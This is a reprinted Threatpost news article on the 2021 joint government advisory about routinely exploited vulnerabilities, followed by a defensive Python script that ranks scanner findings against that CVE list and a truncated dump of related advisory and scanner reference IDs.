In a perfect world, CISA would laminate cards with the year’s top 30 vulnerabilities: You could whip it out and ask a business if they’ve bandaged these specific wounds before you hand over your cash.
This is not a perfect world. There are no laminated vulnerability cards.
But at least we have the list: In a joint advisory ([PDF](<https://us-cert.cisa.gov/sites/default/files/publications/AA21-209A_Joint%20CSA_Top%20Routinely%20Exploited%20Vulnerabilities.pdf>)) published Wednesday, the FBI, the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC) and the UK’s National Cyber Security Centre (NCSC) listed the vulnerabilities that were “routinely” exploited in 2020, as well as those most often being picked apart so far this year.
The vulnerabilities – which lurk in devices or software from the likes of Citrix, Fortinet, Pulse Secure, Microsoft and Atlassian – include publicly known bugs, some of which are growing hair. One, in fact, dates to 2000.
“Cyber actors continue to exploit publicly known – and often dated – software vulnerabilities against broad target sets, including public and private sector organizations worldwide,” according to the advisory. “However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.”
So far this year, cyberattackers are continuing to target vulnerabilities in perimeter-type devices, with particularly high amounts of unwanted attention being devoted to flaws in the perimeter devices sold by Microsoft, Pulse, Accellion, VMware and Fortinet.
All of the vulnerabilities have received patches from vendors. That doesn’t mean those patches have been applied, of course.
## Repent, O Ye Patch Sinners
According to the advisory, attackers are unlikely to stop coming after geriatric vulnerabilities, including CVE-2017-11882: a Microsoft Office remote code execution (RCE) bug that was already near drinking age when it was [patched at the age of 17](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017.
Why would they stop? As long as systems remain unpatched, it’s a win-win for adversaries, the joint advisory pointed out, as it saves bad actors time and effort.
> Adversaries’ use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. —Advisory
In fact, the top four preyed-upon 2020 vulnerabilities were disclosed between 2018 and 2020, and every one of them had a vendor patch available, showing how common it is for organizations running the affected devices or software to sidestep patching or remediation.
The top four:
* [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>): a critical directory-traversal bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway that gives an unauthenticated attacker code execution on the appliance, and with it a foothold on the internal network, with a trivial request. As of December 2020, 17 percent – roughly one in six of the 80,000 organizations affected – still hadn’t patched.
* [CVE-2019-11510](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>): a critical pre-authentication arbitrary file read in Pulse Secure’s Pulse Connect Secure VPN that let attackers pull plaintext credentials off the appliance. Credentials stolen before a patch kept working after it, so attackers went on to compromise organizations that had already applied the fix; in April 2020, the Department of Homeland Security (DHS) urged affected users to reset passwords for [Active Directory](<https://threatpost.com/podcast-securing-active-directory-nightmare/168203/>) accounts for exactly that reason.
* [CVE-2018-13379](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>): a path-traversal flaw in the SSL VPN web portal of Fortinet’s FortiOS that exposes system files, including session credentials. It was disclosed in 2018 and was still under active exploitation as of April 2021, when the FBI and CISA warned about it.
* [CVE-2020-5902](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>): a critical remote code execution flaw in the Traffic Management User Interface (TMUI) of F5 Networks’ BIG-IP application delivery controllers that, within days of its July 2020 disclosure, was being exploited to scrape credentials, drop malware and more.
The cybersecurity bodies urged organizations to remediate or mitigate these vulnerabilities as soon as possible to shrink their exposure. For those that can’t do so quickly, the advisory encouraged checking for the indicators of compromise (IOCs) it lists; patching alone does not evict an attacker who got in before the fix was applied, as the Pulse Secure credential-theft cases showed.
If IOCs are found, kick off incident response and recovery plans, and let CISA know: the advisory contains instructions on how to report incidents or request technical help.
## 2020 Top 12 Exploited Vulnerabilities
Here’s the full list of the top dozen exploited bugs from last year:
**Vendor** | **Product** | **CVE** | **Type**
---|---|---|---
Citrix | ADC and Gateway | CVE-2019-19781 | arbitrary code execution
Pulse Secure | Pulse Connect Secure | CVE-2019-11510 | arbitrary file reading
Fortinet | FortiOS SSL VPN | CVE-2018-13379 | path traversal
F5 | BIG-IP (TMUI) | CVE-2020-5902 | remote code execution (RCE)
MobileIron | Core and Connector | CVE-2020-15505 | RCE
Microsoft | Office (Equation Editor) | CVE-2017-11882 | RCE
Atlassian | Crowd and Crowd Data Center | CVE-2019-11580 | RCE
Drupal | Drupal core (“Drupalgeddon2”) | CVE-2018-7600 | RCE
Telerik | UI for ASP.NET AJAX | CVE-2019-18935 | RCE
Microsoft | SharePoint | CVE-2019-0604 | RCE
Microsoft | Windows (BITS) | CVE-2020-0787 | elevation of privilege
Microsoft | Windows Netlogon (“Zerologon”) | CVE-2020-1472 | elevation of privilege
## Most Exploited So Far in 2021
CISA et al. also listed these 13 flaws, all disclosed this year, that are being energetically exploited:
* Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065: four flaws chained together in the attack known as ProxyLogon, in which a server-side request forgery (CVE-2021-26855) lets an unauthenticated attacker pose as the Exchange server itself and the remaining bugs let it run code as SYSTEM or write files, typically a web shell, to disk. The chain set off a [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>). The frenzy was warranted: even by late March, when Microsoft reported that 92 percent of internet-facing Exchange servers had been patched or mitigated against [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), tens of thousands remained exposed.
* Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. As of May, CVE-2021-22893 was being used by at least two advanced persistent threat actors (APTs), likely linked to China, [to attack U.S. defense targets,](<https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/>) among others.
* Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103 and CVE-2021-27104, in the legacy File Transfer Appliance (FTA). These led to a wave of data-theft and extortion attacks, including [on Shell](<https://threatpost.com/shell-victim-of-accellion-attacks/164973/>). Around 100 Accellion FTA customers, including the [Jones Day law firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), were affected by attacks [tied to FIN11 and the Clop ransomware gang](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>).
* VMware: CVE-2021-21985: a [critical bug](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) in the vSAN Health Check plug-in of vCenter Server, VMware’s virtualization management platform. The plug-in is enabled by default in the vSphere Client, so an unauthenticated attacker with network access to port 443 can run commands on the underlying host and take control of the environment vCenter manages.
The advisory gave technical details for all these vulnerabilities along with guidance on mitigation and IOCs to help organizations figure out if they’re vulnerable or have already been compromised. The advisory also offers guidance for locking down systems.
## Can Security Teams Keep Up?
Rick Holland, Digital Shadows CISO and vice president of strategy, called CISA vulnerability alerts an “influential tool to help teams stay above water and minimize their attack surface.”
The CVEs highlighted in Wednesday’s alert “continue to demonstrate that attackers are going after known vulnerabilities and leverage zero-days only when necessary,” he told Threatpost on Thursday.
Recent research ([PDF](<https://l.vulcancyber.com/hubfs/Infographics/Pulse%20research%20project%20-%202021-07-23%20-%20How%20are%20Businesses%20Mitigating%20Cyber%20Risk.pdf>)) from Vulcan Cyber found that more than three-quarters of the cybersecurity leaders surveyed had been impacted by a security vulnerability over the past year. That raises the question: Is there a mismatch between enterprise vulnerability management programs and the ability of security teams to mitigate risk?
Yaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, suggested that it’s become ever more vital for enterprise IT security stakeholders to make “meaningful changes to their cyber hygiene efforts.” That means “prioritizing risk-based cybersecurity efforts, increasing collaboration between security and IT teams, updating vulnerability management tooling, and enhancing enterprise risk analytics, especially in businesses with advanced cloud application programs.”
Granted, vulnerability management is “one of the most difficult aspects of any security program,” he continued. But if a given vulnerability is being exploited, that should kick it up the priority list, Bar-Dayan said. “Taking a risk-based approach to vulnerability management is the way forward; and teams should unquestionably be prioritizing vulnerabilities that are actively being exploited.”
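The table of 2020 CVEs above and Bar-Dayan’s point about prioritizing actively exploited bugs suggest a practical use for the advisory: treat its CVE list as the “laminated card” and run every scanner finding past it. The Python script below is an added example, not code from the article, the advisory or any vendor. It normalizes CVE identifiers (the list is reproduced with the inconsistent spacing seen on this page, which real scanner exports also suffer from), matches each finding against the 2020 and 2021 lists, and ranks known-exploited, internet-facing findings ahead of everything else regardless of CVSS score. The CSV layout, host names and findings are constructed for illustration; the CVE IDs are the ones the article lists, plus one real CVE that is not on the list (CVE-2014-0160, Heartbleed) as a control.

```python
"""Triage scanner findings against the AA21-209A "routinely exploited" CVE list.

Added example; not code from the Threatpost article, the joint advisory or
any vendor. The CVE identifiers are those the article reproduces from the
advisory. The CSV layout, host names and findings are constructed for
illustration and are not real scan data.
"""
import csv
import io
import re
from collections import Counter

# 2020 top 12, written exactly as the article prints them (inconsistent
# separators included) so the normaliser is exercised on realistic input.
ROUTINELY_EXPLOITED_2020 = {
    "CVE-2019-19781", "CVE 2019-11510", "CVE 2018-13379", "CVE 2020-5902",
    "CVE 2020-15505", "CVE-2017-11882", "CVE-2019-11580", "CVE-2018-7600",
    "CVE 2019-18935", "CVE-2019-0604", "CVE-2020-0787", "CVE-2020-1472",
}
# 2021 list: ProxyLogon (4), Pulse Connect Secure (4), Accellion FTA (4), vCenter (1).
ROUTINELY_EXPLOITED_2021 = {
    "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE2021-27065",
    "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900",
    "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104",
    "CVE-2021-21985",
}

# Tolerates "CVE-2019-11510", "CVE 2019-11510", "CVE2021-27065", "cve_2020_5902".
_CVE_RE = re.compile(r"CVE[\s_-]?(\d{4})[\s_-]?(\d{4,})", re.IGNORECASE)


def normalize_cve(text):
    """Return the canonical 'CVE-YYYY-NNNN' form, or None if no CVE ID is present.

    A raw string comparison would miss "CVE 2019-11510" vs "CVE-2019-11510";
    normalising both sides first is what makes the set lookup reliable.
    """
    m = _CVE_RE.search(text)
    return f"CVE-{m.group(1)}-{m.group(2)}" if m else None


KNOWN_EXPLOITED = {
    normalize_cve(c) for c in ROUTINELY_EXPLOITED_2020 | ROUTINELY_EXPLOITED_2021
}

# Constructed scanner export (hosts and findings are invented for this example).
# CVE-2014-0160 (Heartbleed) is a real CVE that is NOT on the advisory list,
# included as a control so the ranking has something to push down.
SAMPLE_SCAN_CSV = """host,cve,cvss,exposure
vpn-01.example.internal,CVE-2018-13379,9.8,internet
vpn-01.example.internal,CVE-2019-11510,10.0,internet
mail-01.example.internal,cve-2021-26855,9.8,internet
mail-01.example.internal,CVE-2021-27065,7.8,internet
dc-01.example.internal,CVE-2020-1472,10.0,internal
wiki-01.example.internal,CVE-2019-11580,9.8,internal
app-07.example.internal,CVE-2014-0160,7.5,internet
build-02.example.internal,CVE-2020-0787,7.8,internal
"""


def triage(scan_csv, known_exploited=KNOWN_EXPLOITED):
    """Parse a scanner CSV and rank findings for remediation.

    P1: on the known-exploited list and internet-exposed
    P2: on the known-exploited list, internal only
    P3: everything else (ranked by CVSS, but after every P1/P2)
    Within a bucket, higher CVSS first, then host name for a stable order.
    """
    rows = []
    for rec in csv.DictReader(io.StringIO(scan_csv)):
        cve = normalize_cve(rec["cve"])
        if cve is None:
            continue  # drop malformed rows rather than mis-rank them silently
        exploited = cve in known_exploited
        internet = rec["exposure"].strip().lower() == "internet"
        priority = "P1" if exploited and internet else "P2" if exploited else "P3"
        rows.append({
            "host": rec["host"],
            "cve": cve,
            "cvss": float(rec["cvss"]),
            "exposure": rec["exposure"].strip(),
            "exploited": exploited,
            "priority": priority,
        })
    rows.sort(key=lambda r: (r["priority"], -r["cvss"], r["host"]))
    return rows


def summarize(rows):
    """Count findings per priority bucket, e.g. {'P1': 4, 'P2': 3, 'P3': 1}."""
    return dict(Counter(r["priority"] for r in rows))


if __name__ == "__main__":
    ranked = triage(SAMPLE_SCAN_CSV)
    for r in ranked:
        flag = "KNOWN-EXPLOITED" if r["exploited"] else ""
        print(f'{r["priority"]} {r["cvss"]:5.1f} {r["cve"]:<15} '
              f'{r["host"]:<27} {r["exposure"]:<9} {flag}')
    print(summarize(ranked))
```

Run as a script to print the ranked list. Note that the Heartbleed control row, CVSS 7.5 and internet-facing, lands last: exploitation status outranks score. In practice, replace SAMPLE_SCAN_CSV with your scanner’s export and feed the known-exploited set from CISA’s subsequent Known Exploited Vulnerabilities catalog rather than hand-maintaining it.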
072921 15:02 UPDATE: Corrected misattribution of quotes.
Originally published as “CISA’s Top 30 Bugs: One’s Old Enough to Buy Beer” by Lisa Vaas, Threatpost, July 29, 2021: https://threatpost.com/cisa-top-bugs-old-enough-to-buy-beer/168247/
"D7D65B87-E44D-559F-B05B-6AED7C8659D5", "D7D704DD-277E-5739-BD5E-3782370FCCB3", "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "DFB437A9-A514-588D-8B48-A6C7C75EAD32", "E2A4C4A7-DB29-591E-810E-A216F49A9CDF", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "E90678A1-4183-5E58-A4E2-5E48E8767D92", "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F085F702-F1C3-5ACB-99BE-086DA182D98B", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D43FE5-47AE-591C-A2DD-8F92BC12D9A8", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "F472C105-E3B1-524A-BBF5-1C436185F6EE", "F5339382-9321-5B96-934D-B803353CC9E3", "FACAC587-D738-561E-B976-3A97B6202667", "FB99D0AC-3747-583A-AE7D-EE0F4E626D66", "FC661572-B96B-5B2C-B12F-E8D279E189BF"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:1063256", "H1:1119224", "H1:1119228", "H1:534630", "H1:536134", "H1:632721"]}, {"type": "hivepro", "idList": ["HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54", "HIVEPRO:8DA601C83DB9C139357327C06B06CB36", "HIVEPRO:911A69A767BEAA3AE3152870FD54DF6F", "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "HIVEPRO:C72A6CAC86F253C92A64FF6B8FCDA675", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20201105-01-NETLOGON"]}, {"type": "ibm", "idList": ["8190BE7075BCD3ECD99D09840619467A00B84599B985C4B2AB342389339984B1", "CBB1F0F0AF16A09B88EDDD5E242727A3EF12C793CFCE5ED8C34772D7D40B12CB"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:4416FB86A8069C419B8EAC9DBF52A644", "IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B", "IMPERVABLOG:9DE0CE48F84BCF9764A6FA0372DB2AD1", "IMPERVABLOG:A20D453136A0817CB6973C79EBE9F6D1", "IMPERVABLOG:B21E6C61B26ED07C8D647C57348C4F9E", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D"]}, {"type": "kaspersky", "idList": ["KLA11139", "KLA11417", "KLA11689", "KLA11692", 
"KLA11929", "KLA11931", "KLA12103"]}, {"type": "kitploit", "idList": ["KITPLOIT:3701426813255055656", "KITPLOIT:4421457840699592233", "KITPLOIT:4707889613618662864", "KITPLOIT:5420210148456420402", "KITPLOIT:5494076556436489947", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:62E2D32C0ABD1C4B8EA91C60B425255B", "KREBS:65D25A653F7348C7F18FFD951447B275", "KREBS:952ACEBFD55EBD076910C6B233491883", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62", "KREBS:DF8493DA16F49CE6247436830678BA8D"]}, {"type": "mageia", "idList": ["MGASA-2020-0380"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1AE2302579AF5E9849B438BD21910FB8", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:4F1B52F3E373AB0DA5BF646A554AEE8D", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:68B17F5C372DE1EBC787E579794B6AD9", "MALWAREBYTES:775442060A0795887FAB657C06773723", "MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B", "MALWAREBYTES:7C9E5CAE3DDA4E673D38360AB2A5706B", "MALWAREBYTES:7E03882ED3E2DC3F06ABC3D88D86D4E6", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924", "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-ADMIN-DCERPC-CVE_2020_1472_ZEROLOGON-", "MSF:AUXILIARY-GATHER-EXCHANGE_PROXYLOGON_COLLECTOR-", "MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:AUXILIARY-SCANNER-HTTP-EXCHANGE_PROXYLOGON-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-", "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_VSAN_HEALTH_RCE-", "MSF:EXPLOIT-UNIX-WEBAPP-DRUPAL_DRUPALGEDDON2-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_MS17_11882-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYLOGON_RCE-", 
"MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_0787_BITS_ARBITRARY_FILE_MOVE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:28641FE2F73292EB4B26994613CC882B", "MMPC:2FB5327A309898BD59A467446C9C36DC", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:C0F4687B18D53FB9596AD4FDF77092D8", "MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882", "MS:CVE-2019-0604", "MS:CVE-2020-0787", "MS:CVE-2020-1472", "MS:CVE-2021-26412", "MS:CVE-2021-26854", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065", "MS:CVE-2021-27078"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB4011262", "KB4011276", "KB4011604", "KB4011618", "KB4461630", "KB4462143", "KB4462155", "KB4462171", "KB4462184", "KB4462199", "KB4462202", "KB4462211", "KB4601315", "KB4601318", "KB4601319", "KB4601345", "KB4601347", "KB4601348", "KB4601349", "KB4601357", "KB4601363", "KB4601384", "KB5000871", "KB5000978"]}, {"type": "msrc", "idList": ["MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:ED939F90BDE8D7A32031A750388B03C9"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:28641FE2F73292EB4B26994613CC882B", "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:8D599A5B631D1251230D906E6D71C774", "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "MSSECURE:C3D318931D83D536C01D2307EBC0B3B0", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E3C8B97294453D962741782EC959E79C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891024", "MYHACK58:62201891962", "MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201994299", "MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["700224.PRM", "700228.PRM", "700229.PRM", 
"700230.PRM", "701078.PRM", "701262.PRM", "ACCELLION_FTA_9_12_380.NASL", "AL2_ALAS-2021-1585.NASL", "ALA_ALAS-2021-1469.NASL", "ALMA_LINUX_ALSA-2021-1647.NASL", "CENTOS8_RHSA-2021-1647.NASL", "CENTOS_RHSA-2020-5439.NASL", "CITRIX_NETSCALER_CTX267027.NASL", "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "CROWD_3_4_4.NASL", "CROWD_CVE-2019-11580.NASL", "DEBIAN_DLA-1325.NASL", "DEBIAN_DLA-2463.NASL", "DEBIAN_DSA-4156.NASL", "DRUPAL_8_5_1.NASL", "DRUPAL_CVE-2018-7600_RCE.NBIN", "EULEROS_SA-2020-2171.NASL", "EULEROS_SA-2020-2181.NASL", "EULEROS_SA-2020-2299.NASL", "EULEROS_SA-2020-2396.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "EULEROS_SA-2021-1517.NASL", "EULEROS_SA-2021-1533.NASL", "EULEROS_SA-2021-1625.NASL", "EULEROS_SA-2021-1635.NASL", "EULEROS_SA-2021-2168.NASL", "EXCHANGE_CVE-2021-26855.NBIN", "FEDORA_2018-906BA26B4D.NASL", "FEDORA_2018-922CC2FBAA.NASL", "FEDORA_2020-0BE2776ED3.NASL", "FEDORA_2020-77C15664B0.NASL", "FEDORA_2020-A1D139381A.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "GENTOO_GLSA-202012-24.NASL", "HAFNIUM_IOC_DETECT.NBIN", "NETLOGON_ZEROLOGON_CVE-2020-1472.NBIN", "NEWSTART_CGSL_NS-SA-2021-0024_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2021-0167_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2022-0058_SAMBA.NASL", "OPENSUSE-2020-1513.NASL", "OPENSUSE-2020-1526.NASL", "ORACLELINUX_ELSA-2020-5439.NASL", "ORACLELINUX_ELSA-2021-1647.NASL", "PULSE_CONNECT_SECURE-SA44784.NASL", "REDHAT-RHSA-2020-5439.NASL", "REDHAT-RHSA-2021-1647.NASL", "REDHAT-RHSA-2021-3723.NASL", "SL_20201215_SAMBA_ON_SL7_X.NASL", "SMB_NT_MS17_NOV_OFFICE.NASL", "SMB_NT_MS19_FEB_OFFICE_SHAREPOINT.NASL", "SMB_NT_MS19_MAR_OFFICE_SHAREPOINT.NASL", "SMB_NT_MS20_AUG_4565349.NASL", "SMB_NT_MS20_AUG_4571694.NASL", "SMB_NT_MS20_AUG_4571703.NASL", "SMB_NT_MS20_AUG_4571729.NASL", "SMB_NT_MS20_AUG_4571736.NASL", "SMB_NT_MS20_MAR_4538461.NASL", "SMB_NT_MS20_MAR_4540670.NASL", 
"SMB_NT_MS20_MAR_4540673.NASL", "SMB_NT_MS20_MAR_4540681.NASL", "SMB_NT_MS20_MAR_4540688.NASL", "SMB_NT_MS20_MAR_4540689.NASL", "SMB_NT_MS20_MAR_4540693.NASL", "SMB_NT_MS20_MAR_4541506.NASL", "SMB_NT_MS20_MAR_4541509.NASL", "SMB_NT_MS20_MAR_4541510.NASL", "SMB_NT_MS21_FEB_4601347.NASL", "SMB_NT_MS21_MAR_EXCHANGE_2010_OOB.NASL", "SMB_NT_MS21_MAR_EXCHANGE_OOB.NASL", "SUSE_SU-2020-2719-1.NASL", "SUSE_SU-2020-2720-1.NASL", "SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2722-1.NASL", "SUSE_SU-2020-2724-1.NASL", "SUSE_SU-2020-2730-1.NASL", "UBUNTU_USN-4510-1.NASL", "UBUNTU_USN-4559-1.NASL", "VMWARE_VCENTER_CVE-2021-21985.NBIN", "VMWARE_VCENTER_VMSA-2021-0010.NASL", "WEB_APPLICATION_SCANNING_112365", "WEB_APPLICATION_SCANNING_112366", "WEB_APPLICATION_SCANNING_112367", "WEB_APPLICATION_SCANNING_112368", "WEB_APPLICATION_SCANNING_113244", "WEB_APPLICATION_SCANNING_98216", "WEB_APPLICATION_SCANNING_98564", "WEB_APPLICATION_SCANNING_98565", "WEB_APPLICATION_SCANNING_98566", "WEB_APPLICATION_SCANNING_98567", "WEB_APPLICATION_SCANNING_98568", "WEB_APPLICATION_SCANNING_98569", "WEB_APPLICATION_SCANNING_98570", "WEB_APPLICATION_SCANNING_98656", "WEB_APPLICATION_SCANNING_98657", "WEB_APPLICATION_SCANNING_98658", "WEB_APPLICATION_SCANNING_98659", "WEB_APPLICATION_SCANNING_98660"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108438", "OPENVAS:1361412562310141028", "OPENVAS:1361412562310141029", "OPENVAS:1361412562310704156", "OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812583", "OPENVAS:1361412562310812584", "OPENVAS:1361412562310814523", "OPENVAS:1361412562310815788", "OPENVAS:1361412562310815789", "OPENVAS:1361412562310815790", "OPENVAS:1361412562310815791", "OPENVAS:1361412562310815792", "OPENVAS:1361412562310815793", "OPENVAS:1361412562310815796", "OPENVAS:1361412562310815797", "OPENVAS:1361412562310874382", "OPENVAS:1361412562310874383", "OPENVAS:1361412562310874421", 
"OPENVAS:1361412562310874422", "OPENVAS:1361412562310874428", "OPENVAS:1361412562310874456", "OPENVAS:1361412562310875500", "OPENVAS:1361412562310875534", "OPENVAS:1361412562310876320", "OPENVAS:1361412562310891325"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5439", "ELSA-2021-1647"]}, {"type": "osv", "idList": ["OSV:DLA-1325-1", "OSV:DLA-2463-1", "OSV:DSA-4156-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226", "PACKETSTORM:147181", "PACKETSTORM:147182", "PACKETSTORM:147247", "PACKETSTORM:147392", "PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:158056", "PACKETSTORM:160127", "PACKETSTORM:161806", "PACKETSTORM:161846", "PACKETSTORM:161938", "PACKETSTORM:162610", "PACKETSTORM:162736", "PACKETSTORM:163487", "PACKETSTORM:163810"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "QUALYSBLOG:22DFA98A7ED25A67B3D38EAAE5C82A9E", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840", "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD", "QUALYSBLOG:A8EE36FB3E891C73934CB1C60E3B3D41", "QUALYSBLOG:AF3D80BA12D4BBA1EE3BE23A5E730B6C", "QUALYSBLOG:B0EFD469309D1127FA70F0A42934D5BC", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", 
